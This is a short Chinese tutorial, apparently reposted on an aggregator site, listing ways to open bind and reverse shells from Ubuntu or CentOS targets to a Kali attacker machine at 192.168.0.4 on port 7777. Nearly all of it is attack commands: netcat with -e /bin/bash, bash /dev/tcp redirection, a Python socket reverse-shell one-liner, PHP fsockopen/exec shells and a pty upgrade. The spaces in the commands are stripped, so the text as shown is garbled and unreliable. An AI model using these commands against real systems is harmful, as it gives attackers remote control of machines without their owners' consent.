详解NC反弹shell的几种方法
假如ubuntu、CentOS为目标服务器系统
kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用
最终是将ubuntu、CentOS的shell反弹到kali上
正向反弹shell
ubuntu或者CentOS上面输入
nc-lvp7777-e/bin/bash
kali上输入
ncip7777
正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。
需要目标机安装nc。
反向反弹shell
方法1:bash反弹
bash-i>&/dev/tcp/ip/port0>&1
但首先需要在kali上使用nc监听端口:
nc-lvp7777
此方法在ubuntu下不会反弹成功,CentOS可以反弹成功。
方法2:python反弹
反弹shell的命令如下:
python-c"importos,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
首先,使用nc在kali上监听端口:
nc-lvp7777
在CentOS或者ubuntu下使用python去反向连接,输入:
python-c"importos,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
此方法ubuntu和Linux均反弹成功。
方法3
首先在kali上输入nc监听:
nc-lvp7777
在CentOS或者ubuntu上使用nc去反向连接,命令如下:
nc-e/bin/bash192.168.0.47777
方法4:php反弹shell
首先在kali上输入:
nc-lvp7777
然后在目标机上输入:
php-'exec("/bin/bash-i>&/dev/tcp/192.168.0.4/7777")'
或
php-r'$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash-i0>&31>&32>&3");'
注意php反弹shell的这些方法都需要php关闭safe_mode这个选项,才可以使用exec函数。
遇到反弹后不是正常的shell,可用命令:
python-c'importpty;pty.spawn("/bin/bash")'
转化为常规的shell。
到此这篇关于详解NC反弹shell的几种方法的文章就介绍到这了,更多相关NC反弹shell内容请搜索毛票票以前的文章或继续浏览下面的相关文章希望大家以后多多支持毛票票!
声明:本文内容来源于网络,版权归原作者所有,内容由互联网用户自发贡献自行上传,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任。如果您发现有涉嫌版权的内容,欢迎发送邮件至:czq8825#qq.com(发邮件时,请将#更换为@)进行举报,并提供相关证据,一经查实,本站将立刻删除涉嫌侵权内容。